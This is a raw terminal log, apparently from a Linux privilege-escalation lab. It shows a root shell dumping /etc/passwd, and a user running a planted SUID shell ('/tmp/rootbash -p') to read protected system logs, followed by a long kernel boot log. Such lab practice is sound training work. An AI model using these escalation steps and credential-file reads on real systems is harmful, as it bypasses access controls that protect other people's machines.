767nounset off
768onecmd off
769physical off
770pipefail off
771posix off
772privileged off
773verbose off
774vi off
775xtrace off
776id
777uid=0(root) gid=0(root) groups=0(root)
778ls
779cat /etc/passwd
780root:x:0:0:root:/root:/bin/bash
781daemon:x:1:1:daemon:/usr/sbin:/bin/sh
782bin:x:2:2:bin:/bin:/bin/sh
783sys:x:3:3:sys:/dev:/bin/sh
784sync:x:4:65534:sync:/bin:/bin/sync
785games:x:5:60:games:/usr/games:/bin/sh
786man:x:6:12:man:/var/cache/man:/bin/sh
787lp:x:7:7:lp:/var/spool/lpd:/bin/sh
788mail:x:8:8:mail:/var/mail:/bin/sh
789news:x:9:9:news:/var/spool/news:/bin/sh
790uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
791proxy:x:13:13:proxy:/bin:/bin/sh
792www-data:x:33:33:www-data:/var/www:/bin/sh
793backup:x:34:34:backup:/var/backups:/bin/sh
794list:x:38:38:Mailing List Manager:/var/list:/bin/sh
795irc:x:39:39:ircd:/var/run/ircd:/bin/sh
796gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
797nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
798libuuid:x:100:101::/var/lib/libuuid:/bin/sh
799Debian-exim:x:101:103::/var/spool/exim4:/bin/false
800sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
801user:x:1000:1000:user,,,:/home/user:/bin/bash
802statd:x:103:65534::/var/lib/nfs:/bin/false
803mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
804bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
805user@debian:/usr/local/bin$
806
807login as: user
808user@10.10.170.166's password:
809Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
810
811The programs included with the Debian GNU/Linux system are free software;
812the exact distribution terms for each program are described in the
813individual files in /usr/share/doc/*/copyright.
814
815Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
816permitted by applicable law.
817Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
818user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
819user@debian:~$ cat l33t.txt
820user@debian:~$ ls
821l33t.txt myvpn.ovpn tools
822user@debian:~$ cat l33t.txt
823user@debian:~$ ls
824l33t.txt myvpn.ovpn tools
825user@debian:~$ dmesg | grep /var/log/messages
826user@debian:~$ tail -f /var/log/messages
827tail: cannot open `/var/log/messages' for reading: Permission denied
828user@debian:~$ tail -f /var/log/messages | less
829user@debian:~$ tail -f /var/log/auth.log
830tail: cannot open `/var/log/auth.log' for reading: Permission denied
831user@debian:~$ /tmp/rootbash -p
832rootbash-4.1# tail -f /var/log/messages
833Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
834Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
835Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
836Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
837Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
838Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
839Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
840Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
841Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
842Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
843
844
845
846
847
848ls
849^C
850rootbash-4.1# cat /var/log/messages
851May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
852May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
853May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
854May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
855May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
856May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
857May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
858May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
859May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
860May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
861May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
862May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
863May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
864May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
865May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
866May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
867May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
868May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
869May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
870May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
871May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
872May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
873May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
874May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
875May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
876May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
877May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
878May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
879May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
880May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
881May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
882May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
883May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
884May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
885May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
886May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
887May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
888May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
889May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
890May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
891May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
892May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
893May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
894May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
895May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
896May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
897May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
898May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
899May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
900May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
901May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
902May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
903May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
904May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
905May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
906May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
907May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
908May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
909May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
910May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
911May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
912May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
913May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
914May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
915May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
916May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
917May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
918May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
919May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
920May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
921May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
922May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
923May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
924May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
925May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
926May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
927May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
928May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
932May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
933May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
934May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
935May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
936May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
937May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
938May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
939May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
940May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
941May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
942May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
943May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
944May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
945May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
946May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
947May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
948May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
949May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
950May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
951May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
952May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
953May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
954May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
955May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
956May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
957May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
958May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
959May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
960May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
961May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
962May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
963May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
964May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
965May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
966May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
967May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
968May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
969May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
970May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
971May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
972May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
973May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
974May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
975May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
976May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
977May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
978May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
979May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
980May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
981May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
982May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
983May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
984May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
985May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
986May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
987May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
988May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
989May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
990May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
991May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
992May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
993May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
994May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
995May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
996May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
997May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
998May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
999May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1000May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1001May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1002May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1003May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1004May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1005May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1006May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1007May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1008May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1009May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1010May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1011May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1012May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1013May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1014May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1015May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1016May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1018May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1019May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1020May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1021May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1022May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1023May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1024May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1025May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1026May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1027May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1028May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1029May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1030May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1031May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1032May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1033May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1034May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1035May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1036May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1037May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1038May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1039May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1040May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1041May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1042May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1043May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1044May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1045May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1046May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1047May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1048May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1049May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1050May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1051May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1052May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1053May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1054May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1055May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1056May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1057May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1058May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1059May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1060May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1061May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1062May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1063May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1064May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1065May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1066May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1067May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1068May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1069May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1070May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1071May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1072May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1073May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1074May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1075May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1076May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1077May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1078May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1079May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1080May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1081May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1082May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1083May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1084May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
1085May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1086May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1087May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1088May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1089May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1090May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1091May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1092May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1093May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1094May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1095May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1096May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1097May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1098May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1099May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1100May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1101May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
1102May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
